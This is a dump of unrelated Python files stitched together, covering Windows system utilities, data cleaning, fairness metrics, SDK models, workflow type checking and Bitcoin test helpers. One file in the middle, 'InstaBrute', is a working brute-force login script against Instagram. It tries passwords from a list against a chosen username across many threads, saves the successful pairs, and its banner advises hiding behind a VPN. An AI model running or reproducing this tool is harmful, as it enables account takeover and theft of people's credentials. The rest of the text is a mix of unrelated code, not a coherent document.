if sysnative and self.check_sysnative_dir_exists():
return self.get_sysnative_dir()
if not sysnative and self._is_64bit_arch():
return self.get_syswow64_dir()
return self.get_system32_dir()
def is_nano_server(self):
return self._check_server_level("NanoServer")
def _check_server_level(self, server_level):
try:
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows NT\\CurrentVersion\\Server\\"
"ServerLevels") as key:
return winreg.QueryValueEx(key, server_level)[0] == 1
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def execute_powershell_script(self, script_path, sysnative=True):
base_dir = self._get_system_dir(sysnative)
powershell_path = os.path.join(base_dir,
'WindowsPowerShell\\v1.0\\'
'powershell.exe')
args = [powershell_path]
if not self.is_nano_server():
args += ['-ExecutionPolicy', 'RemoteSigned', '-NonInteractive',
'-File']
args.append(script_path)
return self.execute_process(args, shell=False)
def execute_system32_process(self, args, shell=True, decode_output=False,
sysnative=True):
base_dir = self._get_system_dir(sysnative)
process_path = os.path.join(base_dir, args[0])
return self.execute_process([process_path] + args[1:],
decode_output=decode_output, shell=shell)
def get_maximum_password_length(self):
return 20
def set_timezone(self, timezone_name):
windows_name = windows_tz.tz_win.get(timezone_name)
if not windows_name:
raise exception.CloudbaseInitException(
"The given timezone name is unrecognised: %r" % timezone_name)
timezone.Timezone(windows_name).set(self)
def is_real_time_clock_utc(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation') as key:
try:
utc = winreg.QueryValueEx(key, 'RealTimeIsUniversal')[0]
return utc != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
raise
def set_real_time_clock_utc(self, utc):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'RealTimeIsUniversal', 0,
winreg.REG_DWORD, 1 if utc else 0)
def get_page_files(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management') as key:
values = winreg.QueryValueEx(key, 'PagingFiles')[0]
page_files = []
for value in values:
v = value.split(" ")
path = v[0]
min_size_mb = int(v[1]) if len(v) > 1 else 0
max_size_mb = int(v[2]) if len(v) > 2 else 0
page_files.append((path, min_size_mb, max_size_mb))
return page_files
def set_page_files(self, page_files):
values = []
for path, min_size_mb, max_size_mb in page_files:
values.append("%s %d %d" % (path, min_size_mb, max_size_mb))
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'PagingFiles', 0,
winreg.REG_MULTI_SZ, values)
def enable_trim(self, enable):
"""Enables or disables TRIM delete notifications."""
args = ["fsutil.exe", "behavior", "set", "disabledeletenotify",
"0" if enable else "1"]
(out, err, ret_val) = self.execute_system32_process(args)
if ret_val:
raise exception.CloudbaseInitException(
                'TRIM configuration failed.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def set_path_admin_acls(self, path):
LOG.debug("Assigning admin ACLs on path: %s", path)
# Sets ACLs for "NT AUTHORITY\SYSTEM" and "BUILTIN\Administrators"
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"icacls.exe", path, "/inheritance:r", "/grant:r",
"*S-1-5-18:(OI)(CI)F", "*S-1-5-32-544:(OI)(CI)F"])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to set path ACLs.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def take_path_ownership(self, path, username=None):
if username:
raise NotImplementedError()
LOG.debug("Taking ownership of path: %s", path)
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"takeown.exe", "/F", path])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to take path ownership.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def check_dotnet_is_installed(self, version):
# See: https://msdn.microsoft.com/en-us/library/hh925568(v=vs.110).aspx
if str(version) != "4":
raise exception.CloudbaseInitException(
"Only checking for version 4 is supported at the moment")
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\NET Framework Setup\\NDP\\'
'v%s\\Full' % version) as key:
return winreg.QueryValueEx(key, 'Install')[0] != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def get_file_version(self, path):
info = win32api.GetFileVersionInfo(path, '\\')
ms = info['FileVersionMS']
ls = info['FileVersionLS']
return (win32api.HIWORD(ms), win32api.LOWORD(ms),
win32api.HIWORD(ls), win32api.LOWORD(ls))
def get_default_script_exec_header(self):
return constant.SCRIPT_HEADER_CMD
|
from .core import *
from .usual_models import *
|
import pandas as pd
import re
data = pd.read_csv("BIPMetadata_current.csv")
def format_date(date_column):
# formatting the date data to display as yyyy-mm-dd
new_dates = []
for date in date_column:
month = date[0:date.find('/')]
date = date[date.find('/')+1:]
day = date[0:date.find('/')]
year = date[date.find('/')+1:]
if (len(month) == 1):
month = "0" + month
if (len(day) == 1):
day = "0" + day
if (len(year) == 2):
year = "20" + year
newDate = year + "-" + month + "-" + day
print(newDate)
new_dates.append(newDate)
return new_dates
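# Illustrative sketch (hypothetical input, not part of the original script):
# format_date turns m/d/y strings into zero-padded ISO dates, e.g.
#
#     format_date(["1/5/21", "12/31/2019"])  # -> ["2021-01-05", "2019-12-31"]
#
# Note it also prints each converted date as a side effect.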
def truncate(column, length):
# truncates given column to given length and returns new column
new_d = []
for d in column:
if (len(d) > length):
d = d[0:length]
new_d.append(d)
return new_d
# source: https://stackoverflow.com/questions/9662346/python-code-to-remove-html-tags-from-a-string
def cleanhtml(column):
new_desc = []
for d in column:
cleanr = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')
cleantext = re.sub(cleanr, '', d)
new_desc.append(' '.join(cleantext.split()))
return new_desc
def remove_spaces(column):
new_sql = []
for d in column:
new_sql.append(' '.join(d.split()))
return new_sql
new_created = format_date(data["created"])
print("UPDATAED")
new_updated = format_date(data["updated"])
new_query = remove_spaces(data["sql_query"])
new_query = truncate(new_query, 5000)
new_description = truncate(data["description"], 500)
new_description = cleanhtml(new_description)
data["created"] = new_created
data["updated"] = new_updated
data["sql_query"] = new_query
data["description"] = new_description
data.to_csv("BIPMetadata_cleaned.csv", index=False)
|
import os
from wellcomeml.ml.clustering import TextClustering
from wellcomeml.viz.visualize_clusters import visualize_clusters
def test_output_html(tmp_path):
"""Tests that the output html is generated correclty by the clustering function"""
# This will be the file to
temporary_file = os.path.join(tmp_path, 'test-cluster.html')
# Run clustering on small dummy data (see test_clustering.py)
cluster = TextClustering(embedding_random_state=42,
reducer_random_state=43,
clustering_random_state=44)
X = ['Wellcome Trust',
'The Wellcome Trust',
'Sir Henry Wellcome',
'Francis Crick',
'Crick Institute',
'Francis Harry Crick']
cluster.fit(X)
# Run the visualisation function with output_file=temporary_file
visualize_clusters(clustering=cluster, output_file_path=temporary_file, radius=0.01,
alpha=0.5, output_in_notebook=False)
# Assert that the html was generated correctly
assert os.path.exists(temporary_file)
|
#!/usr/bin/env python
import numpy as np
from collections import defaultdict
import itertools
from sklearn.metrics import confusion_matrix
def print_data_stats(sens_attr, class_labels):
"""Print a few numbers about the data: Total number of points, number of
protected examples and unprotected examples, and number of protected points
in positive class, and number of unprotected points in positive class.
Parameters
-----------
sens_attr: numpy array
The sensitive attribute of shape=(number_points,).
    class_labels: numpy array
The class labels of shape=(number_points,).
"""
non_prot_all = sum(sens_attr == 1.0) # non-protected group
prot_all = len(sens_attr) - non_prot_all # protected group
non_prot_pos = sum(class_labels[sens_attr == 1.0] == 1.0) # non_protected in positive class
prot_pos = sum(class_labels == 1.0) - non_prot_pos # protected in positive class
frac_non_prot_pos = float(non_prot_pos) / float(non_prot_all)
frac_prot_pos = float(prot_pos) / float(prot_all)
    print()
print("Total data points: %d" % len(sens_attr))
print("# non-protected examples: %d" % non_prot_all)
print("# protected examples: %d" % prot_all)
print("# non-protected examples in positive class: %d (%0.1f%%)" % (non_prot_pos, non_prot_pos * 100.0 / non_prot_all))
print("# protected examples in positive class: %d (%0.1f%%)" % (prot_pos, prot_pos * 100.0 / prot_all))
def get_positive_rate(y_predicted, y_true):
"""Compute the positive rate for given predictions of the class label.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
Returns
---------
pr: float
The positive rate.
"""
tn, fp, fn, tp = confusion_matrix(y_true, y_predicted).ravel()
pr = (tp+fp) / (tp+fp+tn+fn)
return pr
def get_true_positive_rate(y_predicted, y_true):
"""Compute the true positive rate for given predictions of the class label.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
Returns
---------
tpr: float
The true positive rate.
"""
tn, fp, fn, tp = confusion_matrix(y_true, y_predicted).ravel()
tpr = tp / (tp+fn)
return tpr
def compute_fairness_measures(y_predicted, y_true, sens_attr):
"""Compute value of demographic parity and equality of opportunity for given predictions.
Parameters
----------
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
y_true: numpy array
The true class labels of shape=(number_points,).
sens_attr: numpy array
The sensitive labels of shape=(number_points,).
Returns
----------
DDP: float
The difference of demographic parity.
DEO: float
The difference of equality of opportunity.
"""
positive_rate_prot = get_positive_rate(y_predicted[sens_attr==-1], y_true[sens_attr==-1])
positive_rate_unprot = get_positive_rate(y_predicted[sens_attr==1], y_true[sens_attr==1])
true_positive_rate_prot = get_true_positive_rate(y_predicted[sens_attr==-1], y_true[sens_attr==-1])
true_positive_rate_unprot = get_true_positive_rate(y_predicted[sens_attr==1], y_true[sens_attr==1])
DDP = positive_rate_unprot - positive_rate_prot
DEO = true_positive_rate_unprot - true_positive_rate_prot
rates = [positive_rate_unprot, positive_rate_prot]
DP = np.min(rates)/(np.max(rates) + 1e-5)
return DDP, DEO, DP
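# Minimal worked example (hypothetical data, not from the original module):
#
#     y_pred = np.array([1., 1., 0., 1.])
#     y_true = np.array([1., 0., 0., 1.])
#     sens   = np.array([1., 1., -1., -1.])   # 1 = unprotected, -1 = protected
#     DDP, DEO, DP = compute_fairness_measures(y_pred, y_true, sens)
#
# Here the unprotected group has positive rate 1.0 and the protected group 0.5,
# so DDP = 0.5; both groups have a true positive rate of 1.0, so DEO = 0.0.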
def get_accuracy(y_true, y_predicted):
"""Compute the accuracy for given predicted class labels.
Parameters
----------
y_true: numpy array
The true class labels of shape=(number_points,).
y_predicted: numpy array
The predicted class labels of shape=(number_points,).
Returns
---------
accuracy: float
The accuracy of the predictions.
"""
correct_answers = (y_predicted == y_true).astype(int) # will have 1 when the prediction and the actual label match
accuracy = float(sum(correct_answers)) / float(len(correct_answers))
return accuracy
|
# (C) 2022 GoodData Corporation
from __future__ import annotations
from pathlib import Path
from typing import List, Optional, Type
import attr
from gooddata_metadata_client.model.declarative_user import DeclarativeUser
from gooddata_metadata_client.model.declarative_users import DeclarativeUsers
from gooddata_sdk.catalog.base import Base
from gooddata_sdk.catalog.identifier import CatalogUserGroupIdentifier
from gooddata_sdk.utils import create_directory, read_layout_from_file, write_layout_to_file
LAYOUT_USERS_DIR = "users"
LAYOUT_USERS_FILE = "users.yaml"
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeUsers(Base):
users: List[CatalogDeclarativeUser]
@staticmethod
def client_class() -> Type[DeclarativeUsers]:
return DeclarativeUsers
@classmethod
def load_from_disk(cls, layout_organization_folder: Path) -> CatalogDeclarativeUsers:
users_directory = layout_organization_folder / LAYOUT_USERS_DIR
users_file = users_directory / LAYOUT_USERS_FILE
data = read_layout_from_file(users_file)
users = []
for record in data:
users.append(CatalogDeclarativeUser.from_dict(record, camel_case=True))
return cls(users=users)
def store_to_disk(self, layout_organization_folder: Path) -> None:
users_directory = layout_organization_folder / LAYOUT_USERS_DIR
users_file = users_directory / LAYOUT_USERS_FILE
create_directory(users_directory)
users = [user.to_dict(camel_case=True) for user in self.users]
write_layout_to_file(users_file, users)
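    # Hypothetical round-trip sketch (paths are placeholders, not from the source):
    # the layout folder is expected to contain users/users.yaml, so
    #
    #     org_folder = Path("gooddata_layouts/my_org")
    #     users = CatalogDeclarativeUsers.load_from_disk(org_folder)
    #     users.store_to_disk(org_folder)
    #
    # reads the declarative users from disk and writes them back unchanged.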
@attr.s(auto_attribs=True, kw_only=True)
class CatalogDeclarativeUser(Base):
id: str
auth_id: Optional[str] = None
user_groups: List[CatalogUserGroupIdentifier] = []
@staticmethod
def client_class() -> Type[DeclarativeUser]:
return DeclarativeUser
|
import logging
from collections import namedtuple
from typing import (Any, Callable, Dict, # pylint: disable=unused-import
Generator, Iterable, List, Optional, Text, Union, cast)
import schema_salad.validate as validate
from schema_salad.sourceline import SourceLine, bullets, strip_dup_lineno
import six
from .errors import WorkflowException
from .loghandler import _logger
from .process import shortname
from .utils import json_dumps
def _get_type(tp):
# type: (Any) -> Any
if isinstance(tp, dict):
if tp.get("type") not in ("array", "record", "enum"):
return tp["type"]
return tp
def check_types(srctype, sinktype, linkMerge, valueFrom):
# type: (Any, Any, Optional[Text], Optional[Text]) -> Text
"""Check if the source and sink types are "pass", "warning", or "exception".
"""
if valueFrom:
return "pass"
elif not linkMerge:
if can_assign_src_to_sink(srctype, sinktype, strict=True):
return "pass"
elif can_assign_src_to_sink(srctype, sinktype, strict=False):
return "warning"
else:
return "exception"
elif linkMerge == "merge_nested":
return check_types({"items": _get_type(srctype), "type": "array"}, _get_type(sinktype), None, None)
elif linkMerge == "merge_flattened":
return check_types(merge_flatten_type(_get_type(srctype)), _get_type(sinktype), None, None)
else:
raise WorkflowException(u"Unrecognized linkMerge enu_m '%s'" % linkMerge)
def merge_flatten_type(src):
# type: (Any) -> Any
"""Return the merge flattened type of the source type
"""
if isinstance(src, list):
return [merge_flatten_type(t) for t in src]
elif isinstance(src, dict) and src.get("type") == "array":
return src
else:
return {"items": src, "type": "array"}
def can_assign_src_to_sink(src, sink, strict=False): # type: (Any, Any, bool) -> bool
"""Check for identical type specifications, ignoring extra keys like inputBinding.
src: admissible source types
sink: admissible sink types
In non-strict comparison, at least one source type must match one sink type.
In strict comparison, all source types must match at least one sink type.
"""
if src == "Any" or sink == "Any":
return True
if isinstance(src, dict) and isinstance(sink, dict):
if sink.get("not_connected") and strict:
return False
if src["type"] == "array" and sink["type"] == "array":
return can_assign_src_to_sink(src["items"], sink["items"], strict)
elif src["type"] == "record" and sink["type"] == "record":
return _compare_records(src, sink, strict)
elif src["type"] == "File" and sink["type"] == "File":
for sinksf in sink.get("secondaryFiles", []):
if not [1 for srcsf in src.get("secondaryFiles", []) if sinksf == srcsf]:
if strict:
return False
return True
else:
return can_assign_src_to_sink(src["type"], sink["type"], strict)
elif isinstance(src, list):
if strict:
for t in src:
if not can_assign_src_to_sink(t, sink):
return False
return True
else:
for t in src:
if can_assign_src_to_sink(t, sink):
return True
return False
elif isinstance(sink, list):
for t in sink:
if can_assign_src_to_sink(src, t):
return True
return False
else:
return src == sink
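# Quick sketch of the matching rules (hypothetical types, not from the source):
#
#     can_assign_src_to_sink("File", "Any")              # True: "Any" matches anything
#     can_assign_src_to_sink(["File", "null"], "File")   # True: non-strict needs one match
#     can_assign_src_to_sink(["File", "null"], "File", strict=True)  # False: all must match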
def _compare_records(src, sink, strict=False):
# type: (Dict[Text, Any], Dict[Text, Any], bool) -> bool
"""Compare two records, ensuring they have compatible fields.
This handles normalizing record names, which will be relative to workflow
step, so that they can be compared.
"""
def _rec_fields(rec): # type: (Dict[Text, Any]) -> Dict[Text, Any]
out = {}
for field in rec["fields"]:
name = shortname(field["name"])
out[name] = field["type"]
return out
srcfields = _rec_fields(src)
sinkfields = _rec_fields(sink)
for key in six.iterkeys(sinkfields):
if (not can_assign_src_to_sink(
srcfields.get(key, "null"), sinkfields.get(key, "null"), strict)
and sinkfields.get(key) is not None):
_logger.info("Record comparison failure for %s and %s\n"
"Did not match fields for %s: %s and %s" %
(src["name"], sink["name"], key, srcfields.get(key),
sinkfields.get(key)))
return False
return True
def static_checker(workflow_inputs, workflow_outputs, step_inputs, step_outputs, param_to_step):
# type: (List[Dict[Text, Any]], List[Dict[Text, Any]], List[Dict[Text, Any]], List[Dict[Text, Any]], Dict[Text, Dict[Text, Any]]) -> None
"""Check if all source and sink types of a workflow are compatible before run time.
"""
# source parameters: workflow_inputs and step_outputs
# sink parameters: step_inputs and workflow_outputs
# make a dictionary of source parameters, indexed by the "id" field
src_parms = workflow_inputs + step_outputs
src_dict = {}
for parm in src_parms:
src_dict[parm["id"]] = parm
step_inputs_val = check_all_types(src_dict, step_inputs, "source")
workflow_outputs_val = check_all_types(src_dict, workflow_outputs, "outputSource")
warnings = step_inputs_val["warning"] + workflow_outputs_val["warning"]
exceptions = step_inputs_val["exception"] + workflow_outputs_val["exception"]
warning_msgs = []
exception_msgs = []
for warning in warnings:
src = warning.src
sink = warning.sink
linkMerge = warning.linkMerge
if sink.get("secondaryFiles") and sorted(sink.get("secondaryFiles",[])) != sorted(src.get("secondaryFiles",[])):
msg1 = "Sink '%s'" % (shortname(sink["id"]))
msg2 = SourceLine(sink.get("_tool_entry", sink), "secondaryFiles").makeError(
"expects secondaryFiles: %s but" % (sink.get("secondaryFiles")))
if "secondaryFiles" in src:
msg3 = SourceLine(src, "secondaryFiles").makeError(
"source '%s' has secondaryFiles %s." % (shortname(src["id"]), src.get("secondaryFiles")))
else:
msg3 = SourceLine(src, "id").makeError(
"source '%s' does not include secondaryFiles." % (shortname(src["id"])))
msg4 = SourceLine(src, "id").makeError("To fix, add secondaryFiles: %s to definition of '%s'." % (sink.get("secondaryFiles"), shortname(src["id"])))
msg = SourceLine(sink).makeError("%s\n%s" % (msg1, bullets([msg2, msg3, msg4], " ")))
elif sink.get("not_connected"):
msg = SourceLine(sink, "type").makeError(
"'%s' is not an input parameter of %s, expected %s"
% (shortname(sink["id"]), param_to_step[sink["id"]]["run"],
", ".join(shortname(s["id"])
for s in param_to_step[sink["id"]]["inputs"]
if not s.get("not_connected"))))
else:
msg = SourceLine(src, "type").makeError(
"Source '%s' of type %s may be incompatible"
% (shortname(src["id"]), json_dumps(src["type"]))) + "\n" + \
SourceLine(sink, "type").makeError(
" with sink '%s' of type %s"
% (shortname(sink["id"]), json_dumps(sink["type"])))
if linkMerge:
msg += "\n" + SourceLine(sink).makeError(" source has linkMerge method %s" % linkMerge)
warning_msgs.append(msg)
for exception in exceptions:
src = exception.src
sink = exception.sink
linkMerge = exception.linkMerge
msg = SourceLine(src, "type").makeError(
"Source '%s' of type %s is incompatible"
% (shortname(src["id"]), json_dumps(src["type"]))) + "\n" + \
SourceLine(sink, "type").makeError(
" with sink '%s' of type %s"
% (shortname(sink["id"]), json_dumps(sink["type"])))
if linkMerge:
msg += "\n" + SourceLine(sink).makeError(" source has linkMerge method %s" % linkMerge)
exception_msgs.append(msg)
for sink in step_inputs:
if ('null' != sink["type"] and 'null' not in sink["type"]
and "source" not in sink and "default" not in sink and "valueFrom" not in sink):
msg = SourceLine(sink).makeError(
"Required parameter '%s' does not have source, default, or valueFrom expression"
% shortname(sink["id"]))
exception_msgs.append(msg)
all_warning_msg = strip_dup_lineno("\n".join(warning_msgs))
all_exception_msg = strip_dup_lineno("\n".join(exception_msgs))
if warnings:
_logger.warning("Workflow checker warning:\n%s" % all_warning_msg)
if exceptions:
raise validate.ValidationException(all_exception_msg)
SrcSink = namedtuple("SrcSink", ["src", "sink", "linkMerge"])
def check_all_types(src_dict, sinks, sourceField):
# type: (Dict[Text, Any], List[Dict[Text, Any]], Text) -> Dict[Text, List[SrcSink]]
    # sourceField is either "source" or "outputSource"
"""Given a list of sinks, check if their types match with the types of their sources.
"""
validation = {"warning": [], "exception": []} # type: Dict[Text, List[SrcSink]]
for sink in sinks:
if sourceField in sink:
valueFrom = sink.get("valueFrom")
if isinstance(sink[sourceField], list):
srcs_of_sink = [src_dict[parm_id] for parm_id in sink[sourceField]]
linkMerge = sink.get("linkMerge", ("merge_nested"
if len(sink[sourceField]) > 1 else None))
else:
parm_id = sink[sourceField]
srcs_of_sink = [src_dict[parm_id]]
linkMerge = None
for src in srcs_of_sink:
check_result = check_types(src, sink, linkMerge, valueFrom)
if check_result == "warning":
validation["warning"].append(SrcSink(src, sink, linkMerge))
elif check_result == "exception":
validation["exception"].append(SrcSink(src, sink, linkMerge))
return validation
|
from isserviceup.services.models.statuspage import StatusPagePlugin
class Loggly(StatusPagePlugin):
name = 'Loggly'
status_url = 'http://status.loggly.com//'
icon_url = '/images/icons/loggly.jpg'
|
import tensorflow as tf
from contextlib import contextmanager
from PIL import Image
from keras import backend as K
from keras.utils.data_utils import OrderedEnqueuer
def heteroscedastic_loss(attention=False,
block_attention_gradient=False,
mode='l2'):
''' Heteroscedastic loss.'''
def het_loss(y_true, y_pred):
y_mean = y_pred[:,:,:,:3]
y_logvar = y_pred[:,:,:,3:]
y_logvar = K.clip(y_logvar, -10, 10)
if mode == 'l2':
euclidian_loss = K.square(y_true/127.5 - y_mean/127.5)
elif mode == 'l1':
euclidian_loss = K.abs(y_true/127.5 - y_mean/127.5)
loss = tf.exp(-y_logvar)*euclidian_loss + y_logvar
loss *= 127.5
if mode == 'l2':
loss *= 127.5
if attention:
attention_mask = K.sigmoid(y_logvar)
if block_attention_gradient:
attention_mask = K.stop_gradient(attention_mask)
loss = attention_mask * loss
return K.mean(loss, axis=-1)
return het_loss
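# Hypothetical usage sketch (model and shapes are assumptions, not from the source):
# the network must output 6 channels per pixel, 3 for the predicted mean and 3
# for the log-variance consumed by the loss above, e.g.
#
#     model.compile(optimizer='adam',
#                   loss=heteroscedastic_loss(attention=False, mode='l2'))
#
# where `model` is a Keras model whose final layer has 6 output channels.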
@contextmanager
def concurrent_generator(sequence, num_workers=8, max_queue_size=32, use_multiprocessing=False):
enqueuer = OrderedEnqueuer(sequence, use_multiprocessing=use_multiprocessing)
try:
enqueuer.start(workers=num_workers, max_queue_size=max_queue_size)
yield enqueuer.get()
finally:
enqueuer.stop()
def init_session(gpu_memory_fraction):
K.tensorflow_backend.set_session(tensorflow_session(gpu_memory_fraction=gpu_memory_fraction))
def reset_session(gpu_memory_fraction):
K.clear_session()
init_session(gpu_memory_fraction)
def tensorflow_session(gpu_memory_fraction):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = gpu_memory_fraction
return tf.Session(config=config)
def load_image(path):
img = Image.open(path)
if img.mode != 'RGB':
img = img.convert('RGB')
return img
|
from __future__ import absolute_import
from __future__ import print_function
import requests, sys, threading, time, os, random
from random import randint
from six.moves import input
CheckVersion = str (sys.version)
import re
from datetime import datetime
print ('''
....
%
^
L
"F3 $r
$$$$.e$" .
"$$$$$" "
(insTof by 5) $$$$c /
. $$$$$$$P
."c $$$
.$c3b ..J$$$$$e
4$$$$ .$$$$$$$$$$$$$$c
$$$$b .$$$$$$$$$$$$$$$$r
$$$. .$$$$$$$$$$$$$$$$$$
$$$c .$$$$$$$ "$$$$$$$$$r
Author : Falah
snapchat : flaah999
 This tool relies on VPN software. Please enable a VPN before running it.
""""""""""""""""""""""""""""""""""""""""""
''')
class InstaBrute (object):
def __init__(self):
try:
user = input ('username : ')
Combo = input ('passList : ')
print ('\n----------------------------')
except:
            print (' The tool was stopped, exiting ')
sys.exit ()
with open (Combo, 'r') as x:
Combolist = x.read ().splitlines ()
thread = []
self.Coutprox = 0
for combo in Combolist:
password = combo.split (':')[0]
t = threading.Thread (target=self.New_Br, args=(user, password))
t.start ()
thread.append (t)
time.sleep (0.9)
for j in thread:
j.join ()
def cls(self):
linux = 'clear'
windows = 'cls'
os.system ([linux, windows][os.name == 'nt'])
def New_Br(self, user, pwd):
link = 'https://www.instagram.com/accounts/login/'
login_url = 'https://www.instagram.com/accounts/login/ajax/'
time = int (datetime.now ().timestamp ())
payload = {
'username': user,
'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{pwd}',
'queryParams': {},
'optIntoOneTap': 'false'
}
with requests.Session () as s:
r = s.get (link)
r = s.post (login_url, data=payload, headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://www.instagram.com/accounts/login/",
"x-csrftoken": 'ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo'
})
print (f'{user}:{pwd}\n----------------------------')
if 'checkpoint_url' in r.text:
print (('' + user + ':' + pwd + ' --> Good hack '))
with open ('good.txt', 'a') as x:
x.write (user + ':' + pwd + '\n')
elif 'two_factor_required' in r.text:
print (('' + user + ':' + pwd + ' --> Good It has to be checked '))
with open ('results_NeedVerfiy.txt', 'a') as x:
x.write (user + ':' + pwd + '\n')
InstaBrute()
|
#!/usr/bin/env python
#from gevent import monkey
#monkey.patch_all(aggressive=True)
#from psycogreen.gevent import patch_psycopg
#patch_psycopg()
#import eventlet
#eventlet.monkey_patch()
#from psycogreen.eventlet import patch_psycopg
#patch_psycopg()
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "internetnl.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
class AutoVivification(dict):
"""Implementation of perl's autovivification."""
def __missing__(self, key):
value = self[key] = type(self)()
return value
weather = AutoVivification()
weather['china']['guangdong']['shenzhen'] = 'sunny'
weather['china']['hubei']['wuhan'] = 'sunny'
weather['USA']['California']['Los Angeles'] = 'sunny'
print(weather)
|
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Helpful routines for regression testing."""
from base64 import b64encode
from binascii import hexlify, unhexlify
from decimal import Decimal, ROUND_DOWN
import hashlib
import inspect
import json
import logging
import os
import random
import re
from subprocess import CalledProcessError
import time
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
logger = logging.getLogger("TestFramework.utils")
# Assert functions
##################
def assert_fee_amount(fee, tx_size, fee_per_kB):
"""Assert the fee was in range"""
target_fee = round(tx_size * fee_per_kB / 1000, 8)
if fee < target_fee:
raise AssertionError("Fee of %s CPT too low! (Should be %s CPT)" % (str(fee), str(target_fee)))
# allow the wallet's estimation to be at most 2 bytes off
if fee > (tx_size + 2) * fee_per_kB / 1000:
raise AssertionError("Fee of %s CPT too high! (Should be %s CPT)" % (str(fee), str(target_fee)))
def assert_equal(thing1, thing2, *args):
if thing1 != thing2 or any(thing1 != arg for arg in args):
raise AssertionError("not(%s)" % " == ".join(str(arg) for arg in (thing1, thing2) + args))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s" % (str(thing1), str(thing2)))
def assert_greater_than_or_equal(thing1, thing2):
if thing1 < thing2:
raise AssertionError("%s < %s" % (str(thing1), str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
assert_raises_message(exc, None, fun, *args, **kwds)
def assert_raises_message(exc, message, fun, *args, **kwds):
try:
fun(*args, **kwds)
except JSONRPCException:
raise AssertionError("Use assert_raises_rpc_error() to test RPC failures")
except exc as e:
if message is not None and message not in e.error['message']:
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_raises_process_error(returncode, output, fun, *args, **kwds):
"""Execute a process and asserts the process return code and output.
Calls function `fun` with arguments `args` and `kwds`. Catches a CalledProcessError
and verifies that the return code and output are as expected. Throws AssertionError if
no CalledProcessError was raised or if the return code and output are not as expected.
Args:
returncode (int): the process return code.
output (string): [a substring of] the process output.
fun (function): the function to call. This should execute a process.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
try:
fun(*args, **kwds)
except CalledProcessError as e:
if returncode != e.returncode:
raise AssertionError("Unexpected returncode %i" % e.returncode)
if output not in e.output:
raise AssertionError("Expected substring not found:" + e.output)
else:
raise AssertionError("No exception raised")
def assert_raises_rpc_error(code, message, fun, *args, **kwds):
"""Run an RPC and verify that a specific JSONRPC exception code and message is raised.
Calls function `fun` with arguments `args` and `kwds`. Catches a JSONRPCException
and verifies that the error code and message are as expected. Throws AssertionError if
no JSONRPCException was raised or if the error code/message are not as expected.
Args:
code (int), optional: the error code returned by the RPC call (defined
in src/rpc/protocol.h). Set to None if checking the error code is not required.
message (string), optional: [a substring of] the error string returned by the
RPC call. Set to None if checking the error string is not required.
fun (function): the function to call. This should be the name of an RPC.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
assert try_rpc(code, message, fun, *args, **kwds), "No exception raised"
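# Hypothetical usage sketch (the RPC, code, and message below are placeholders):
#
#     assert_raises_rpc_error(-8, "Block height out of range",
#                             node.getblockhash, -1)
#
# The helper calls node.getblockhash(-1) itself and fails the test unless a
# JSONRPCException with that error code and message substring is raised.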
def try_rpc(code, message, fun, *args, **kwds):
"""Tries to run an rpc command.
Test against error code and message if the rpc fails.
Returns whether a JSONRPCException was raised."""
try:
fun(*args, **kwds)
